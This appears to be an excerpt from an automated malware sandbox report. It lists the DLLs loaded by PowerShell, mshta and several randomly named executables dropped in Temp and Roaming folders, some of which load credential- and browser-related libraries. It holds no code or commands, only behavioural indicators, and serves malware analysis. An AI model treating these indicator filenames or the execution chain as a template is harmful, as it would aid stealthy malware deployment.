Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
                                                Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: apphelp.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: winmm.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wininet.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: sspicli.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: uxtheme.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: mstask.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: windows.storage.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wldp.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: mpr.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: dui70.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: duser.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: chartv.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: oleacc.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: atlthunk.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: textinputframework.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: coreuicomponents.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: coremessaging.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: ntmarta.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wintypes.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wintypes.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wintypes.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wtsapi32.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: winsta.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: textshaping.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: propsys.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: windows.staterepositoryps.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: windows.fileexplorer.common.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: iertutil.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: explorerframe.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: profapi.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: edputil.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: urlmon.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: srvcli.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: netutils.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: appresolver.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: bcp47langs.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: slc.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: userenv.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: sppc.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: onecorecommonproxystub.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: winmm.dll
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sspicli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iertutil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.storage.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wldp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: profapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ondemandconnroutehelper.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winhttp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mswsock.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iphlpapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winnsi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: urlmon.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: srvcli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: netutils.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: uxtheme.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: propsys.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: edputil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.staterepositoryps.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wintypes.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: appresolver.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: bcp47langs.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: slc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: userenv.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sppc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecorecommonproxystub.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecoreuapcommonproxystub.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: apphelp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: sspicli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: uxtheme.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: mstask.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: windows.storage.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wldp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: mpr.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: dui70.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: duser.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: chartv.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: onecoreuapcommonproxystub.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: oleacc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: atlthunk.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: textinputframework.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: coreuicomponents.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: coremessaging.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: ntmarta.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: coremessaging.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wintypes.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wintypes.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wintypes.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wtsapi32.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: winsta.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: textshaping.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: propsys.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: windows.staterepositoryps.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: windows.fileexplorer.common.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: iertutil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: profapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: edputil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: urlmon.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: srvcli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: netutils.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: appresolver.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: bcp47langs.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: slc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: userenv.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: sppc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: onecorecommonproxystub.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: explorerframe.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: apphelp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: sspicli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: iertutil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, uxtheme.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Section loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, dpapi.dll, cryptbase.dll, ntmarta.dll, mozglue.dll, wsock32.dll, vcruntime140.dll, msvcp140.dll, vcruntime140.dll, uxtheme.dll, windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe | Section loaded: apphelp.dll, winmm.dll, kernel.appcore.dll, uxtheme.dll, mstask.dll, mstask.dll, mstask.dll, ntmarta.dll, mstask.dll, sspicli.dll, windows.storage.dll, wldp.dll, mpr.dll
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Section loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, dpapi.dll, cryptbase.dll, ntmarta.dll
